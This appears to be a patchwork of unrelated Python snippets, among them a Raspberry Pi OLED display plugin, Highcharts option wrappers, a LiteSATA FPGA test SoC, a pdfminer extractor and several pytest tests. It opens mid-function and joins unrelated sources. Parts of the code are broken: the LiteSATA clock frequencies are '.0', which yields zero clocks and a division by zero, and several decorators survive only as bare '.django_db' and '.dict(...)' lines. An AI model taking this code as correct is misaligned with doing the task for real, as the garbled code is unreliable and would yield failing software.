        win = SlidingWindow(10, 5, expires)
        for moment in range((now - expires) + 1, now):
            assert win.stale(moment, now) is False

    def test_delta(self):
        now = 60
        win = SlidingWindow(10, 5, 20)
        assert win.delta(now, 30) == (20, 35)

    def test_stale_timestamp(self):
        # Every moment before the expiry horizon is stale.
        expires = 20
        now = 60
        win = SlidingWindow(10, 5, expires)
        for moment in range(0, now - expires):
            print(f'TIME: {moment} NOW TIMESTAMP: {now}')
            assert win.stale(moment, now) is True
def annotate_pips_speed_model(pips, speed_data):
    """Attach timing data from *speed_data* to every pip in *pips*.

    Mutates *pips* in place: for each pip, looks up its speed model (which
    must be a 'pip' resource), copies the pass-transistor flag, expands the
    forward/reverse delay, input-capacitance and resistance values into
    'src_to_dst' / 'dst_to_src' dicts, and drops the consumed
    'speed_model_index' key.
    """
    for pip_name, pip_data in pips.items():
        model = speed_data[pip_data['speed_model_index']]
        assert model['resource_name'] == 'pip', (model['resource_name'], pip_data['speed_model_index'])
        pip_data['is_pass_transistor'] = model['is_pass_transistor']
        pip_data['src_to_dst'] = {
            'delay': model.get('forward_delay', None),
            'in_cap': model.get('forward_in_cap', None),
            'res': model.get('forward_res', None),
        }
        pip_data['dst_to_src'] = {
            'delay': model.get('reverse_delay', None),
            'in_cap': model.get('reverse_in_cap', None),
            'res': model.get('reverse_res', None),
        }
        del pip_data['speed_model_index']
def register(blueprint: DashBlueprint, name: str, prefix=None, **kwargs):
    """Register a DashBlueprint as a Dash page.

    When *prefix* is given, a PrefixIdTransform is appended so component ids
    are namespaced; callbacks are registered on the global blueprint and the
    blueprint's layout is handed to dash.register_page.
    """
    if prefix is not None:
        blueprint.transforms.append(PrefixIdTransform(prefix))
    blueprint.register_callbacks(GLOBAL_BLUEPRINT)
    dash.register_page(name, layout=blueprint._layout_value, **kwargs)
class Plugin(plugin.PluginProto):
    """Task plugin #23: text output on a small I2C OLED via luma.oled.

    taskdevicepluginconfig layout (established by webform_save below):
      [0] driver name (e.g. 'ssd1306')   [1] I2C address (int)
      [2] rotation 0-3                   [3] resolution 'WxH' or 'Default'
      [4] number of text lines           [5] target characters per row
      [6] clear only used lines (bool)
    """
    PLUGIN_ID = 23
    PLUGIN_NAME = 'Display - Simple OLED'
    PLUGIN_VALUENAME1 = 'OLED'
    # maximum number of text lines supported by the web form / renderer
    P23_Nlines = 8

    def __init__(self, taskindex):
        """Set static plugin properties and display-state defaults."""
        plugin.PluginProto.__init__(self, taskindex)
        self.dtype = rpieGlobals.DEVICE_TYPE_I2C
        self.vtype = rpieGlobals.SENSOR_TYPE_NONE
        self.ports = 0
        self.valuecount = 0
        self.senddataoption = False
        self.timeroption = True
        self.timeroptional = True
        self.formulaoption = False
        self.device = None      # luma.oled device instance once initialized
        self.width = None       # explicit panel width, if resolution configured
        self.height = None
        self.lines = []         # per-line display templates
        self.ufont = None       # truetype font sized to the line count
        self.lineheight = 11
        self.charwidth = 8
        self.dispimage = None   # off-screen 1-bit PIL image buffer

    def plugin_init(self, enableplugin=None):
        """Create the configured luma.oled device and prepare font and buffer."""
        plugin.PluginProto.plugin_init(self, enableplugin)
        if self.enabled:
            try:
                i2cl = self.i2c
            except:
                i2cl = (- 1)
            try:
                i2cport = gpios.HWPorts.geti2clist()
                if (i2cl == (- 1)):
                    # no bus selected: fall back to the first available I2C bus
                    i2cl = int(i2cport[0])
            except:
                i2cport = []
            if ((len(i2cport) > 0) and (i2cl > (- 1))):
                if (self.interval > 2):
                    nextr = (self.interval - 2)
                else:
                    nextr = self.interval
                self.initialized = False
                serialdev = None
                self.taskdevicepluginconfig[1] = int(float(self.taskdevicepluginconfig[1]))
                if (self.taskdevicepluginconfig[1] != 0):
                    serialdev = i2c(port=i2cl, address=self.taskdevicepluginconfig[1])
                else:
                    # no I2C address configured -> cannot create the device
                    return self.initialized
                self.device = None
                try:
                    # resolution strings look like '128x64'; anything else means driver default
                    if ('x' in str(self.taskdevicepluginconfig[3])):
                        resstr = str(self.taskdevicepluginconfig[3]).split('x')
                        self.width = int(resstr[0])
                        self.height = int(resstr[1])
                    else:
                        self.width = None
                        self.height = None
                except:
                    self.width = None
                    self.height = None
                if ((str(self.taskdevicepluginconfig[0]) != '0') and (str(self.taskdevicepluginconfig[0]).strip() != '')):
                    # import only the selected driver; each branch is identical
                    # apart from the luma.oled device class used
                    try:
                        if (str(self.taskdevicepluginconfig[0]) == 'ssd1306'):
                            from luma.oled.device import ssd1306
                            if (self.height is None):
                                self.device = ssd1306(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
                            else:
                                self.device = ssd1306(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
                            self.initialized = True
                        elif (str(self.taskdevicepluginconfig[0]) == 'sh1106'):
                            from luma.oled.device import sh1106
                            if (self.height is None):
                                self.device = sh1106(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
                            else:
                                self.device = sh1106(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
                            self.initialized = True
                        elif (str(self.taskdevicepluginconfig[0]) == 'ssd1309'):
                            from luma.oled.device import ssd1309
                            if (self.height is None):
                                self.device = ssd1309(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
                            else:
                                self.device = ssd1309(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
                            self.initialized = True
                        elif (str(self.taskdevicepluginconfig[0]) == 'ssd1331'):
                            from luma.oled.device import ssd1331
                            if (self.height is None):
                                self.device = ssd1331(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
                            else:
                                self.device = ssd1331(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
                            self.initialized = True
                        elif (str(self.taskdevicepluginconfig[0]) == 'ssd1351'):
                            from luma.oled.device import ssd1351
                            if (self.height is None):
                                self.device = ssd1351(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
                            else:
                                self.device = ssd1351(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
                            self.initialized = True
                        elif (str(self.taskdevicepluginconfig[0]) == 'ssd1322'):
                            from luma.oled.device import ssd1322
                            if (self.height is None):
                                self.device = ssd1322(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
                            else:
                                self.device = ssd1322(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
                            self.initialized = True
                        elif (str(self.taskdevicepluginconfig[0]) == 'ssd1325'):
                            from luma.oled.device import ssd1325
                            if (self.height is None):
                                self.device = ssd1325(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
                            else:
                                self.device = ssd1325(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
                            self.initialized = True
                        elif (str(self.taskdevicepluginconfig[0]) == 'ssd1327'):
                            from luma.oled.device import ssd1327
                            if (self.height is None):
                                self.device = ssd1327(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
                            else:
                                self.device = ssd1327(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
                            self.initialized = True
                    except Exception as e:
                        misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('OLED can not be initialized! ' + str(e)))
                        self.enabled = False
                        self.device = None
                        return False
                if (self.device is not None):
                    try:
                        lc = int(self.taskdevicepluginconfig[4])
                    except:
                        lc = self.P23_Nlines
                    if (lc < 1):
                        lc = self.P23_Nlines
                    # size the font so the requested line count fits the panel
                    lineheight = int((self.device.height / lc))
                    self.ufont = ImageFont.truetype('img/UbuntuMono-R.ttf', lineheight)
                    try:
                        self.device.show()
                    except:
                        pass
                    with canvas(self.device) as draw:
                        maxcols = int(self.taskdevicepluginconfig[5])
                        if (maxcols < 1):
                            maxcols = 1
                        tstr = ('X' * maxcols)
                        try:
                            # NOTE(review): ImageDraw.textsize was removed in
                            # Pillow 10 (textbbox/textlength replace it) —
                            # confirm the Pillow version in use
                            sw = draw.textsize(tstr, self.ufont)[0]
                        except:
                            sw = self.device.width
                        # shrink the font until maxcols 'X' characters fit one row
                        while (sw > self.device.width):
                            lineheight -= 1
                            self.ufont = ImageFont.truetype('img/UbuntuMono-R.ttf', lineheight)
                            sw = draw.textsize(tstr, self.ufont)[0]
                        (self.charwidth, self.lineheight) = draw.textsize('X', self.ufont)
                        if (lc in [2, 4, 6, 8]):
                            self.lineheight += 1
                    if (self.interval > 2):
                        nextr = (self.interval - 2)
                    else:
                        nextr = 0
                    # schedule the first read shortly before the next interval tick
                    self._lastdataservetime = (rpieTime.millis() - (nextr * 1000))
                    self.dispimage = Image.new('1', (self.device.width, self.device.height), 'black')
                else:
                    self.initialized = False

    def webform_load(self):
        """Build the device-settings web form from the current configuration."""
        choice1 = str(self.taskdevicepluginconfig[0])
        import luma.oled.device
        options = luma.oled.device.__all__
        webserver.addHtml('<tr><td>Display type:<td>')
        webserver.addSelector_Head('p023_type', True)
        for d in range(len(options)):
            webserver.addSelector_Item(options[d], options[d], (choice1 == options[d]), False)
        webserver.addSelector_Foot()
        choice2 = int(float(self.taskdevicepluginconfig[1]))
        options = ['0x3c', '0x3d']
        optionvalues = [60, 61]
        webserver.addFormSelector('Address', 'p023_adr', len(options), options, optionvalues, None, choice2)
        webserver.addFormNote("Enable <a href='pinout'>I2C bus</a> first, than <a href='i2cscanner'>search for the used address</a>!")
        choice3 = int(float(self.taskdevicepluginconfig[2]))
        options = ['Normal', 'Rotate by 90', 'Rotate by 180', 'Rotate by 270']
        optionvalues = [0, 1, 2, 3]
        webserver.addFormSelector('Mode', 'p023_rotate', len(optionvalues), options, optionvalues, None, choice3)
        options = ['Default', '128x64', '128x128', '128x32', '96x96', '96x64', '64x48', '64x32']
        choice4 = self.taskdevicepluginconfig[3]
        webserver.addHtml('<tr><td>Resolution:<td>')
        webserver.addSelector_Head('p023_res', False)
        for d in range(len(options)):
            webserver.addSelector_Item(options[d], options[d], (choice4 == options[d]), False)
        webserver.addSelector_Foot()
        choice5 = int(float(self.taskdevicepluginconfig[4]))
        webserver.addHtml('<tr><td>Number of lines:<td>')
        webserver.addSelector_Head('p023_linecount', False)
        for l in range(1, (self.P23_Nlines + 1)):
            webserver.addSelector_Item(str(l), l, (l == choice5), False)
        webserver.addSelector_Foot()
        webserver.addFormNumericBox('Try to display # characters per row', 'p023_charperl', self.taskdevicepluginconfig[5], 1, 32)
        webserver.addFormNote("Leave it '1' if you do not care")
        webserver.addFormCheckBox('Clear only used lines', 'p023_partialclear', self.taskdevicepluginconfig[6])
        if ((choice5 > 0) and (choice5 < 9)):
            lc = choice5
        else:
            lc = self.P23_Nlines
        # one template text box per configured line
        for l in range(lc):
            try:
                linestr = self.lines[l]
            except:
                linestr = ''
            webserver.addFormTextBox(('Line' + str((l + 1))), ('p023_template' + str(l)), linestr, 128)
        return True

    def __del__(self):
        """Best-effort: blank and switch off the panel on destruction."""
        try:
            if (self.device is not None):
                self.device.clear()
                self.device.hide()
        except:
            pass

    def plugin_exit(self):
        """Plugin teardown hook; delegates to __del__ cleanup."""
        self.__del__()

    def webform_save(self, params):
        """Persist submitted form values into taskdevicepluginconfig and re-init."""
        par = webserver.arg('p023_type', params)
        if (par == ''):
            par = 0
        self.taskdevicepluginconfig[0] = str(par)
        par = webserver.arg('p023_adr', params)
        if (par == ''):
            par = 0
        self.taskdevicepluginconfig[1] = int(par)
        par = webserver.arg('p023_rotate', params)
        if (par == ''):
            par = 0
        self.taskdevicepluginconfig[2] = int(par)
        par = webserver.arg('p023_res', params)
        self.taskdevicepluginconfig[3] = str(par)
        par = webserver.arg('p023_linecount', params)
        if (par == ''):
            par = 8
        self.taskdevicepluginconfig[4] = int(par)
        par = webserver.arg('p023_charperl', params)
        if (par == ''):
            par = 1
        self.taskdevicepluginconfig[5] = int(par)
        if (webserver.arg('p023_partialclear', params) == 'on'):
            self.taskdevicepluginconfig[6] = True
        else:
            self.taskdevicepluginconfig[6] = False
        for l in range(self.P23_Nlines):
            linestr = webserver.arg(('p023_template' + str(l)), params).strip()
            try:
                self.lines[l] = linestr
            except:
                self.lines.append(linestr)
        self.plugin_init()
        return True

    def plugin_read(self):
        """Render all configured line templates to the panel (periodic read hook)."""
        if (self.initialized and self.enabled and self.device):
            try:
                if (self.taskdevicepluginconfig[6] == False):
                    # full-clear mode: start from a fresh black buffer
                    self.dispimage = Image.new('1', (self.device.width, self.device.height), 'black')
                if self.dispimage:
                    draw = ImageDraw.Draw(self.dispimage)
                    for l in range(int(self.taskdevicepluginconfig[4])):
                        resstr = ''
                        try:
                            linestr = str(self.lines[l])
                            resstr = self.oledparse(linestr)
                        except:
                            resstr = ''
                        if (resstr != ''):
                            y = (l * self.lineheight)
                            if self.taskdevicepluginconfig[6]:
                                # partial-clear mode: wipe only this line's strip
                                draw.rectangle(((0, (y + 2)), (self.device.width, (y + self.lineheight))), fill='black')
                            draw.text((0, y), resstr, fill='white', font=self.ufont)
                    self.device.display(self.dispimage)
            except Exception as e:
                misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('OLED write error! ' + str(e)))
            self._lastdataservetime = rpieTime.millis()
        return True

    def plugin_write(self, cmd):
        """Handle 'oledcmd,...' control commands and 'oled,y,x,text' writes."""
        res = False
        cmdarr = cmd.split(',')
        cmdarr[0] = cmdarr[0].strip().lower()
        if (cmdarr[0] == 'oledcmd'):
            try:
                cmd = cmdarr[1].strip()
            except:
                cmd = ''
            try:
                if (self.device is not None):
                    if (cmd == 'on'):
                        self.device.show()
                        res = True
                    elif (cmd == 'off'):
                        self.device.hide()
                        res = True
                    elif (cmd == 'clear'):
                        self.device.clear()
                        self.dispimage = Image.new('1', (self.device.width, self.device.height), 'black')
                        res = True
                    elif (cmd == 'clearline'):
                        try:
                            l = int(cmdarr[2].strip())
                        except Exception as e:
                            misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('Parameter error: ' + str(e)))
                            return False
                        if ((self.device is not None) and (self.dispimage is not None)):
                            # line numbers are 1-based on the command interface
                            if (l > 0):
                                l -= 1
                            draw = ImageDraw.Draw(self.dispimage)
                            y = (l * self.lineheight)
                            draw.rectangle(((0, (y + 2)), (self.device.width, (y + self.lineheight))), fill='black')
                            self.device.display(self.dispimage)
                            res = True
                    # contrast presets
                    if (cmd == 'low'):
                        self.device.contrast(64)
                        res = True
                    if (cmd == 'med'):
                        self.device.contrast(207)
                        res = True
                    if (cmd == 'high'):
                        self.device.contrast(255)
                        res = True
            except Exception as e:
                misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('OLED command error! ' + str(e)))
                res = False
        elif (cmdarr[0] == 'oled'):
            # locate the start of the free text after 'oled,y,x,'
            sepp = (((len(cmdarr[0]) + len(cmdarr[1])) + len(cmdarr[2])) + 1)
            sepp = cmd.find(',', sepp)
            try:
                y = int(cmdarr[1].strip())
                x = int(cmdarr[2].strip())
                text = cmd[(sepp + 1):]
            except Exception as e:
                misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('Parameter error: ' + str(e)))
                return False
            # coordinates are 1-based on the command interface
            if (x > 0):
                x -= 1
            if (y > 0):
                y -= 1
            try:
                if (self.device is not None):
                    draw = ImageDraw.Draw(self.dispimage)
                    resstr = self.oledparse(text)
                    draw.text(((x * self.charwidth), (y * self.lineheight)), resstr, fill='white', font=self.ufont)
                    self.device.display(self.dispimage)
                    res = True
            except Exception as e:
                misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('OLED command error! ' + str(e)))
                res = False
        return res

    def oledparse(self, ostr):
        """Expand rule templates in *ostr* and strip/replace characters the
        OLED font cannot render ({..} escape codes and HTML entities)."""
        (cl, st) = commands.parseruleline(ostr)
        if (st == 'CMD'):
            resstr = str(cl)
        else:
            resstr = str(ostr)
        if (('{' in resstr) or ('&' in resstr)):
            resstr = resstr.replace('{D}', ' ').replace('&deg;', ' ')
            resstr = resstr.replace('{<<}', '').replace('&laquo;', '')
            resstr = resstr.replace('{>>} ', '').replace('&raquo;', '')
            resstr = resstr.replace('{u} ', '').replace('&micro; ', '')
            resstr = resstr.replace('{E}', '').replace('&euro;', '')
            resstr = resstr.replace('{Y}', '').replace('&yen;', '')
            resstr = resstr.replace('{P}', '').replace('&pound;', '')
            resstr = resstr.replace('{c}', '').replace('&cent;', '')
            resstr = resstr.replace('{^1}', '1').replace('&sup1;', '1')
            resstr = resstr.replace('{^2}', '2').replace('&sup2;', '2')
            resstr = resstr.replace('{^3}', '3').replace('&sup3;', '3')
            resstr = resstr.replace('{1_4}', '14').replace('&frac14;', '14')
            # NOTE(review): '&frac24;' looks like a typo for '&frac12;' — confirm upstream
            resstr = resstr.replace('{1_2}', '12').replace('&frac24;', '12')
            resstr = resstr.replace('{3_4}', '34').replace('&frac34;', '34')
            resstr = resstr.replace('{+-}', '').replace('&plusmn;', '')
            resstr = resstr.replace('{x}', '').replace('&times;', '')
            resstr = resstr.replace('{..}', '').replace('&divide;', '')
        return resstr
# NOTE(review): the bare '.django_db' below appears to be a pytest marker
# (@pytest.mark.django_db) whose '@pytest.mark' prefix was lost in
# extraction — restore the decorator before running.
.django_db
def test_category_awarding_agency_subawards(agency_test_data):
    """Spending-by-category 'awarding_agency' search over subawards must
    return the single expected agency bucket with correct paging metadata."""
    test_payload = {'category': 'awarding_agency', 'subawards': True, 'page': 1, 'limit': 50}
    spending_by_category_logic = AwardingAgencyViewSet().perform_search(test_payload, {})
    expected_response = {'category': 'awarding_agency', 'limit': 50, 'page_metadata': {'page': 1, 'next': None, 'previous': None, 'hasNext': False, 'hasPrevious': False}, 'results': [{'amount': 150, 'name': 'Awarding Toptier Agency 3', 'code': 'TA3', 'id': 1003}], 'messages': [get_time_period_message()]}
    assert (expected_response == spending_by_category_logic)
def get_schema(action):
    """Assemble the full option Schema for *action*: shared defaults merged
    with the action-specific options."""
    shared = [
        option_defaults.allow_ilm_indices(),
        option_defaults.continue_if_exception(),
        option_defaults.disable_action(),
        option_defaults.ignore_empty_list(),
        option_defaults.timeout_override(action),
    ]
    merged = {}
    for piece in shared + list(action_specific(action)):
        merged.update(piece)
    return Schema(merged)
def extractMandarinducktalesWordpressCom(item):
    """Build a release message for known tags, None for previews/untitled
    chapters, False when no tag matches."""
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if 'preview' in item['title'].lower() or not (chp or vol):
        return None
    tagmap = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
class OptionSeriesWindbarbSonificationPointgrouping(Options):
    """Highcharts `series.windbarb.sonification.pointGrouping` option wrapper.

    NOTE(review): every option below is a getter/setter pair sharing one name
    with no decorators visible; upstream these are presumably
    @property / @<name>.setter pairs whose decorators were lost in
    extraction — confirm against the original source before relying on the
    second definition shadowing the first.
    """
    # grouping algorithm (default 'minmax')
    def algorithm(self):
        return self._config_get('minmax')
    def algorithm(self, text: str):
        self._config(text, js_type=False)
    # whether point grouping is enabled (default True)
    def enabled(self):
        return self._config_get(True)
    def enabled(self, flag: bool):
        self._config(flag, js_type=False)
    # timespan of each group in milliseconds (default 15)
    def groupTimespan(self):
        return self._config_get(15)
    def groupTimespan(self, num: float):
        self._config(num, js_type=False)
    # point property used for grouping (default 'y')
    def prop(self):
        return self._config_get('y')
    def prop(self, text: str):
        self._config(text, js_type=False)
def gen_accessor_doc(out, name):
    """Write the documentation-only header (_LOCI_DOC_H_) describing the
    get/set accessors generated for every concrete LOCI class.

    out:  open file-like object the header is written to
    name: header file name, passed through to common_top_matter
    """
    common_top_matter(out, name)
    out.write('/* DOCUMENTATION ONLY */\n')
    for cls in of_g.standard_class_order:
        # Bug fix: this guard previously ended in `pass` (a no-op), so
        # virtual/abstract classes were documented even though they have no
        # concrete accessors; skip them as the guard clearly intended.
        if type_maps.class_is_virtual(cls):
            continue
        out.write(('\n/**\n * Structure for %(cls)s object. Get/set\n * accessors available in all versions unless noted otherwise\n *\n' % dict(cls=cls)))
        if loxi_utils.class_is_list(cls):
            # list classes additionally expose iteration/append helpers
            out.write((' * first Function of type %(cls)s_first_f.\n * Setup a TBD class object to the first entry in the list\n * next Function of type %(cls)s_next_f.\n * Advance a TBD class object to the next entry in the list\n * append_bind Function of type %(cls)s_append_bind_f\n * Setup a TBD class object for append to the end of the current list\n * append Function of type %(cls)s_append_f.\n * Copy an item to the end of a list\n' % dict(cls=cls)))
        for m_name in of_g.ordered_members[cls]:
            if (m_name in of_g.skip_members):
                continue
            ver_type_map = field_ver_get(cls, m_name)
            (m_type, get_rv) = get_acc_rv(cls, m_name)
            if (len(ver_type_map) == 3):
                # present in every version: no version qualifier needed
                ver_string = ''
            else:
                ver_string = '('
                for ver in sorted(ver_type_map):
                    ver_string += (' ' + of_g.short_version_names[ver])
                ver_string += ').'
            f_name = acc_name(cls, m_name)
            out.write((' * %(m_name)s_get/set %(ver_string)s\n * Accessors for %(m_name)s, a variable of type %(m_type)s. Functions\n * are of type %(f_name)s_get_f and _set_f.\n *\n' % dict(f_name=f_name, m_name=m_name, ver_string=ver_string, m_type=m_type)))
        out.write((' */\ntypedef struct %(cls)s_s %(cls)s_t;\n' % dict(cls=cls)))
    out.write('#endif /* _LOCI_DOC_H_ */\n')
def eit_loc_eval(ds: np.ndarray, mesh_obj: mesh.PyEITMesh, mode: str='element'):
    """Locate the strongest-magnitude entry of *ds* on the mesh.

    Returns (coordinates, peak value, sign of peak). With mode='node' the
    node coordinates are used; otherwise element centers.
    """
    peak_idx = np.argmax(np.abs(ds))
    if (mode == 'node'):
        coords = mesh_obj.node[peak_idx]
    else:
        coords = mesh_obj.elem_centers[peak_idx]
    peak = ds[peak_idx]
    return (coords, peak, np.sign(peak))
class SATATestSoC(SoCMini):
    """Minimal LiteSATA bench SoC for the Genesys2 board: PHY + core +
    crossbar + BIST, UART bridge, activity LEDs and optional LiteScope."""
    def __init__(self, platform, gen='gen3', with_analyzer=False):
        assert (gen in ['gen1', 'gen2', 'gen3'])
        # NOTE(review): the `.0` literals below look like frequency constants
        # garbled in extraction (int(.0) is 0 and .0/x divides by a zero
        # clock later) — restore the real sys/SATA clock frequencies
        # (e.g. 200e6 and 1.5e9/3e9/6e9) before use.
        sys_clk_freq = int(.0)
        sata_clk_freq = {'gen1': .0, 'gen2': .0, 'gen3': .0}[gen]
        self.submodules.crg = _CRG(platform, sys_clk_freq)
        SoCMini.__init__(self, platform, sys_clk_freq, ident='LiteSATA bench on Genesys2')
        # UART bridge for host control
        self.add_uartbone()
        # SATA PHY -> core -> crossbar -> BIST chain
        self.submodules.sata_phy = LiteSATAPHY(platform.device, pads=platform.request('fmc2sata'), gen=gen, clk_freq=sys_clk_freq, data_width=16)
        self.submodules.sata_core = LiteSATACore(self.sata_phy)
        self.submodules.sata_crossbar = LiteSATACrossbar(self.sata_core)
        self.submodules.sata_bist = LiteSATABIST(self.sata_crossbar, with_csr=True)
        # timing constraints for the recovered SATA clocks
        # NOTE(review): numerator should be 1e9 (period in ns) — confirm
        platform.add_period_constraint(self.sata_phy.crg.cd_sata_tx.clk, (.0 / sata_clk_freq))
        platform.add_period_constraint(self.sata_phy.crg.cd_sata_rx.clk, (.0 / sata_clk_freq))
        self.platform.add_false_path_constraints(self.crg.cd_sys.clk, self.sata_phy.crg.cd_sata_tx.clk, self.sata_phy.crg.cd_sata_rx.clk)
        # blink LEDs 0-2 from the sys/tx/rx clock domains; LED 3 = PHY ready
        sys_counter = Signal(32)
        self.sync.sys += sys_counter.eq((sys_counter + 1))
        self.comb += platform.request('user_led', 0).eq(sys_counter[26])
        tx_counter = Signal(32)
        self.sync.sata_tx += tx_counter.eq((tx_counter + 1))
        self.comb += platform.request('user_led', 1).eq(tx_counter[26])
        rx_counter = Signal(32)
        self.sync.sata_rx += rx_counter.eq((rx_counter + 1))
        self.comb += platform.request('user_led', 2).eq(rx_counter[26])
        self.comb += platform.request('user_led', 3).eq(self.sata_phy.ctrl.ready)
        if with_analyzer:
            # probe the PHY/link/transport/command FSMs with LiteScope
            analyzer_signals = [self.sata_phy.phy.tx_init.fsm, self.sata_phy.phy.rx_init.fsm, self.sata_phy.ctrl.fsm, self.sata_phy.ctrl.ready, self.sata_phy.source, self.sata_phy.sink, self.sata_core.command.sink, self.sata_core.command.source, self.sata_core.link.rx.fsm, self.sata_core.link.tx.fsm, self.sata_core.transport.rx.fsm, self.sata_core.transport.tx.fsm, self.sata_core.command.rx.fsm, self.sata_core.command.tx.fsm]
            self.submodules.analyzer = LiteScopeAnalyzer(analyzer_signals, 512, csr_csv='analyzer.csv')
def getDBC_v(x, flag):
    """Dirichlet boundary condition for v: zero on all named boundaries
    (and on 'right' only when strong Dirichlet is disabled); None otherwise."""
    if flag in [boundaryTags['left']]:
        return lambda x, t: 0.0
    walls = [boundaryTags['front'], boundaryTags['back'], boundaryTags['top'],
             boundaryTags['bottom'], boundaryTags['obstacle']]
    if flag in walls:
        return lambda x, t: 0.0
    if (ns_forceStrongDirichlet == False) and (flag == boundaryTags['right']):
        return lambda x, t: 0.0
def pdf_to_string(pdf_file):
    """Extract layout objects from *pdf_file* (pdfminer), printing each one
    as before, and return their string representations joined by newlines.

    Fixes: the file handle was never closed (leak on every call), and the
    function — despite its name — returned None; it now returns the text.
    Printing is kept for backward compatibility with callers relying on
    stdout output.
    """
    collected = []
    fp = open(pdf_file, 'rb')
    try:
        parser = PDFParser(fp)
        doc = PDFDocument()
        parser.set_document(doc)
        doc.set_parser(parser)
        doc.initialize('')  # empty password
        rsrcmgr = PDFResourceManager()
        laparams = LAParams()
        laparams.line_margin = 0.3
        laparams.word_margin = 0.3
        device = PDFPageAggregator(rsrcmgr, laparams=laparams)
        interpreter = PDFPageInterpreter(rsrcmgr, device)
        for page in doc.get_pages():
            interpreter.process_page(page)
            layout = device.get_result()
            for lt_obj in layout:
                print(lt_obj)
                collected.append(str(lt_obj))
    finally:
        fp.close()
    return '\n'.join(collected)
def test_create_and_link_node_from_remote_ignore():
    """Fixed launch-plan inputs must be rejected unless listed in
    _inputs_not_allowed; _ignorable_inputs may be omitted or overridden."""
    def wf(i: int, j: int):
        ...
    # 'i' is fixed, 'j' has a default
    lp = LaunchPlan.get_or_create(wf, name='promise-test', fixed_inputs={'i': 1}, default_inputs={'j': 10})
    ctx = context_manager.FlyteContext.current_context().with_compilation_state(CompilationState(prefix=''))
    # without the not-allowed/ignorable hints, the missing fixed input 'i' is an error
    with pytest.raises(FlyteAssertion, match='Missing input `i` type `<FlyteLiteral simple: INTEGER>`'):
        create_and_link_node_from_remote(ctx, lp)
    # hints present: 'i' may be absent, 'j' is ignorable
    create_and_link_node_from_remote(ctx, lp, _inputs_not_allowed={'i'}, _ignorable_inputs={'j'})
    # explicitly passing the fixed input 'i' must still fail
    with pytest.raises(FlyteAssertion, match="ixed inputs cannot be specified. Please remove the following inputs - {'i'}"):
        create_and_link_node_from_remote(ctx, lp, _inputs_not_allowed={'i'}, _ignorable_inputs={'j'}, i=15)
    # overriding the ignorable default 'j' is allowed
    create_and_link_node_from_remote(ctx, lp, _inputs_not_allowed={'i'}, _ignorable_inputs={'j'}, j=15)
class TestZillizVectorDBConfig():
    """ZillizDBConfig must read its URI/token from the environment and fail
    with AttributeError when either variable is missing.

    NOTE(review): the bare '.dict(...)' lines below appear to be
    @mock.patch.dict decorators whose '@mock.patch' prefix was lost in
    extraction — restore before running.
    """
    .dict(os.environ, {'ZILLIZ_CLOUD_URI': 'mocked_uri', 'ZILLIZ_CLOUD_TOKEN': 'mocked_token'})
    def test_init_with_uri_and_token(self):
        """Both env vars present: config picks them up verbatim."""
        expected_uri = 'mocked_uri'
        expected_token = 'mocked_token'
        db_config = ZillizDBConfig()
        assert (db_config.uri == expected_uri)
        assert (db_config.token == expected_token)
    .dict(os.environ, {'ZILLIZ_CLOUD_URI': 'mocked_uri', 'ZILLIZ_CLOUD_TOKEN': 'mocked_token'})
    def test_init_without_uri(self):
        """Missing ZILLIZ_CLOUD_URI: construction must raise AttributeError."""
        try:
            del os.environ['ZILLIZ_CLOUD_URI']
        except KeyError:
            pass
        with pytest.raises(AttributeError):
            ZillizDBConfig()
    .dict(os.environ, {'ZILLIZ_CLOUD_URI': 'mocked_uri', 'ZILLIZ_CLOUD_TOKEN': 'mocked_token'})
    def test_init_without_token(self):
        """Missing ZILLIZ_CLOUD_TOKEN: construction must raise AttributeError."""
        try:
            del os.environ['ZILLIZ_CLOUD_TOKEN']
        except KeyError:
            pass
        with pytest.raises(AttributeError):
            ZillizDBConfig()
class OptionSeriesVariablepieTooltip(Options):
    """Highcharts `series.variablepie.tooltip` option wrapper.

    NOTE(review): each option below is a getter/setter pair sharing one name
    with no decorators visible; upstream these are presumably
    @property / @<name>.setter pairs whose decorators were lost in
    extraction — confirm against the original source.
    """
    def clusterFormat(self):
        return self._config_get('Clustered points: {point.clusterPointsAmount}')
    def clusterFormat(self, text: str):
        self._config(text, js_type=False)
    # sub-option object for per-scale date/time label formats
    def dateTimeLabelFormats(self) -> 'OptionSeriesVariablepieTooltipDatetimelabelformats':
        return self._config_sub_data('dateTimeLabelFormats', OptionSeriesVariablepieTooltipDatetimelabelformats)
    def distance(self):
        return self._config_get(16)
    def distance(self, num: float):
        self._config(num, js_type=False)
    def followPointer(self):
        return self._config_get(True)
    def followPointer(self, flag: bool):
        self._config(flag, js_type=False)
    def followTouchMove(self):
        return self._config_get(True)
    def followTouchMove(self, flag: bool):
        self._config(flag, js_type=False)
    def footerFormat(self):
        return self._config_get('')
    def footerFormat(self, text: str):
        self._config(text, js_type=False)
    def format(self):
        return self._config_get('undefined')
